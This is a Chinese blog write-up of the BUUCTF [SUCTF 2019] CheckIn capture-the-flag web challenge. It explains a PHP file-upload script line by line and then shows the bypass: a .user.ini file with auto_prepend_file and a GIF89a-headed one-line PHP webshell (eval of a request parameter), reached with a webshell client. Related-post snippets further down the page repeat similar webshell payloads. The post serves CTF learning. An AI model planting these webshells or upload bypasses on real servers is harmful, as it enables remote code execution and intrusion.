BUUCTF-[SUCTF 2019]CheckIn

于 2023-10-10 21:24:55 发布
阅读量118 收藏
点赞数
分类专栏: CTF-web 文章标签: 学习 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61361405/article/details/133756055
版权

代码审计

题目提供了源码,看到一个index.php文件,那就代码审计吧!

$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
        die("filesize too big!");
    }
    if (!$name) {
        die("filename cannot be empty!");
    }
    $extension = substr($name, strrpos($name, ".") + 1);
    if (preg_match("/ph|htacess/i", $extension)) {
        die("illegal suffix!");
    }
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
        die("&lt;? in contents!");
    }
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
        die("exif_imagetype:not image!");
    }
    $upload_file_path = $userdir . "/" . $name;
    move_uploaded_file($tmp_name, $upload_file_path);
    echo "Your dir " . $userdir. ' <br>';
    echo 'Your files : <br>';
    var_dump(scandir($userdir));

这段代码看起来是一个简单的文件上传脚本,用于将用户上传的文件保存到服务器上。

1. `$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);`: 这一行代码创建了一个名为 `$userdir` 的变量,用于存储用户上传文件的目录路径。目录名基于用户的 IP 地址经过 MD5 哈希处理而来,这样可以确保每个用户都有一个唯一的目录。

2. `if (!file_exists($userdir)) { mkdir($userdir, 0777, true); }`: 这个条件语句检查目录 `$userdir` 是否存在。如果目录不存在,就使用 `mkdir` 函数创建它。`mkdir` 函数的第一个参数是要创建的目录路径,第二个参数是权限设置(这里设置为 0777,表示最高权限),第三个参数为 `true` 表示如果需要的话,也会创建中间缺失的目录。

3. `file_put_contents($userdir . "/index.php", "");`: 这一行代码将一个空字符串写入 `$userdir` 目录下的 "index.php" 文件中。这可能是为了确保目录存在或者创建一个空的 "index.php" 文件。

4. `if (isset($_POST["upload"])) {`: 这个条件语句检查是否有名为 "upload" 的 POST 参数被发送到服务器。如果存在,说明用户正在尝试上传文件。

5. `$tmp_name = $_FILES["fileUpload"]["tmp_name"];`: 这行代码将上传文件的临时文件名保存在 `$tmp_name` 变量中。

6. `$name = $_FILES["fileUpload"]["name"];`: 这行代码将上传文件的原始文件名保存在 `$name` 变量中。

7. `if (!$tmp_name) { die("filesize too big!"); }`: 这个条件语句检查 `$tmp_name` 是否为空,如果为空,表示上传的文件大小超过了服务器的限制,代码将输出 "filesize too big!" 并终止执行。

8. `if (!$name) { die("filename cannot be empty!"); }`: 这个条件语句检查 `$name` 是否为空,如果为空,表示上传的文件没有指定文件名,代码将输出 "filename cannot be empty!" 并终止执行。

9. `$extension = substr($name, strrpos($name, ".") + 1);`: 这行代码提取上传文件的扩展名并保存在 `$extension` 变量中。它使用 `strrpos` 函数找到文件名中最后一个点的位置,然后使用 `substr` 函数截取点后面的部分作为扩展名。

10. `if (preg_match("/ph|htacess/i", $extension)) { die("illegal suffix!"); }`: 这个条件语句使用正则表达式检查 `$extension` 是否包含 "ph" 或 "htacess",如果是,表示上传的文件扩展名不被允许,代码将输出 "illegal suffix!" 并终止执行。

11. `if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) { die("&lt;? in contents!"); }`: 这个条件语句使用 `file_get_contents` 函数读取临时文件的内容,并使用 `mb_strpos` 函数检查是否包含 "<?" 字符串。如果存在 "<?",表示文件内容中包含 PHP 代码的开头,代码将输出 "&lt;? in contents!" 并终止执行。

12. `$image_type = exif_imagetype($tmp_name);`: 这行代码使用 `exif_imagetype` 函数获取临时文件的图像类型。如果返回值为空,则表示上传的文件不是一个有效的图像文件。

13. `if (!$image_type) { die("exif_imagetype:not image!"); }`: 这个条件语句检查 `$image_type` 是否为空,如果为空,表示上传的文件不是一个有效的图像文件,代码将输出 "exif_imagetype:not image!" 并终止执行。

14. `$upload_file_path = $userdir . "/" . $name;`: 这行代码构建了上传文件的目标路径,将目录路径 `$userdir` 和文件名 `$name` 连接起来。

15. `move_uploaded_file($tmp_name, $upload_file_path);`: 这行代码将临时文件移动到目标路径,完成文件的上传。

16. `echo "Your dir " . $userdir. ' <br>';`: 这行代码输出上传文件的目录路径。

17. `echo 'Your files : <br>';`: 这行代码输出 "Your files :"。

18. `var_dump(scandir($userdir));`: 这行代码使用 `scandir` 函数列出目录 `$userdir` 中的文件和子目录,并将结果打印出来,以展示上传到该目录的文件列表。

本题考查的是使用.user.ini的一个配置文件将1.jpg包含进去

构造:

GIF89a
auto_prepend_file=1.jpg

所以这对文件内容进行检测, 限制文件大小

构造一句话木马文件1.jpg:

GIF89a?
<script language='php'>eval($_REQUEST['cmd']);</script>

上传时要先上传.user.ini配置文件,再上传马

上传成功

根据代码,在提供的目录下会自动创建一个index.php文件,根据提供的路径访问该路径下的index.php文件

访问成功,连蚁剑或者菜刀

南欢richrich
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1587
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
hence-flight-checkin
05-06
link rel =" import " href =" bower_components/hence-flight-checkin/hence-flight-checkin.html " >发展所有开发都是利用/ src和/ test文件夹中的文件进行的。依存关系元素依赖关系通过NPM& 进行管理。 您...
BUUCTF-CheckIn
m0_47571887的博客
11-09 772
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 321
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
BUUCTF_web_CheckIn
silence1_的博客
08-31 2176
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
[BUUCTF]CheckIn (writeup)
weixin_63306244的博客
06-22 159
因为.user.ini是将a.png放到index.php文件的顶部进行执行。回显:exif_imagetype:not image!蚁剑后面的文件是index.php并不是a.png。所以要访问的是index.php。看到这个后就可以直接上蚁剑了。进入后看到是一道上传题。那就只剩下最后一种办法。随后看看了之前用过的。
genshin-daily-checkin
04-23
怎么跑 在Docker Swarm上运行 例子: docker service create --name genshin-daily-login truong996/genshin-daily-login 仅运行Docker docker run -d truong996/genshin-daily-login
sau-class-checkin
04-02
关于 这是一个脚本,如果设置正确,它将告诉SAU您的位置 因为大多数课程都是在一个小时开始的,并且一个好学生应该在该时间之前到达并办理登机手续,所以脚本会设法解决这个问题。 如果您在一个小时的更改前5分钟...
liang-chen-yun-checkin
03-31
报到1:前叉仓库2:在仓库的秘密中记录账号密码设置->秘密2.1: 添加 EMAIL2.2: 添加 PASSWORD
42-qr-checkin:二维码签到
04-01
$ cd 42-qr-checkin $ npm install 在42 intra上注册,然后将重定向URI设置为http://localhost:4200/login/42/return 。 将.env.sample复制到.env并编辑CLIENT_ID和CLIENT_SECRET信息。 启动服务器。 $ npm run ...
genshin-auto-checkin:https
04-07
Genshin Impact Helper:thought_balloon:前言吹水交流:原神是我见过的唯一一个游戏本体和签到福利分离的游戏,玩家为了签到还要额外下载米游社 App。平心而论,目前的每日签到奖励真的不咋地,都知道是蚊子腿。...
genshin-mys-checkin:【蚊子的腿也是腿】原神米游社每日签到,原神微博超话签到,领取礼包,自动推送
03-08
genshin-mys-checkin 每天早上7:00〜7:10随机时间签到 部分失败不会使整体流程终止,和你会收到消息来自GitHub的Actions失败提醒邮件 运行前会自动同步主仓库,并使用主仓库文件解决冲突,如有自定义需求请自行修改...
ZJBTI_COVID-19_Checkin
03-09
浙工商“疫情自动签到”介绍使用GitHub动作自动化执行浙江工商职业技术学院疫情签到。触发方式点亮星凌晨1点定时执行自定义:.github / workflows / main.yaml编辑注意:如果身体状况异常,请立即上报本项目不承担...
yiban-auto-checkin-deprecated:SUST晨午检自动打卡
05-28
"yiban-auto-checkin-deprecated:SUST晨午检自动打卡" 是一个针对SUST(可能指的是一所大学,如三峡大学)学生的自动化工具,它主要用于自动完成学校的晨午检打卡任务。这个项目已被标记为“已弃用”,意味着开发者...
git-code-checkin:用于自动化 Git 代码签入电子邮件的 Python 脚本
07-02
git-code-checkin git-code-checkin 是一个 Python 脚本,用于自动化 Git 代码签入电子邮件。 目前,它仅适用于 Linux 上的 Python 3。 很快,它将跨平台并支持 Python 2。 作者: Ashish Kayastha 依赖关系 ...
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1130
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
buuctf WEB checkin1
qq_41696858的博客
09-28 267
这题考的文件上传 经典一句话先试试,回显文件格式不对,把php文件后缀改成jpg格式 第二次回显,显示文件中包含<?,那就把一句话,改成如下形式 <script language='php'>eval($_POST['niaho']);</script> 成功绕过<?匹配,回显不是图片格式,图片头绕过GIF89a 成功上传,下面就是如何上传php文件,或者执行php代码了 经过检测,对于文件类型进行了严格的过滤,改后缀肯定不行 经过检测,可以上传.user.ini文件(
BUUCTF】[SUCTF 2019]CheckIn
aoao331198的博客
04-09 477
废话不多讲,老生常谈的文件上传题目 需要传一个图片马 GIF89a <script language='php'>@eval($_POST['abc']);</script> 还有一个.user.ini文件 文件上传之.user.ini GIF89a auto_prepend_file=upload.jpg 作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。 蚁剑链接 http://c8a6d5ca-0f52-4c27-a06f-
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值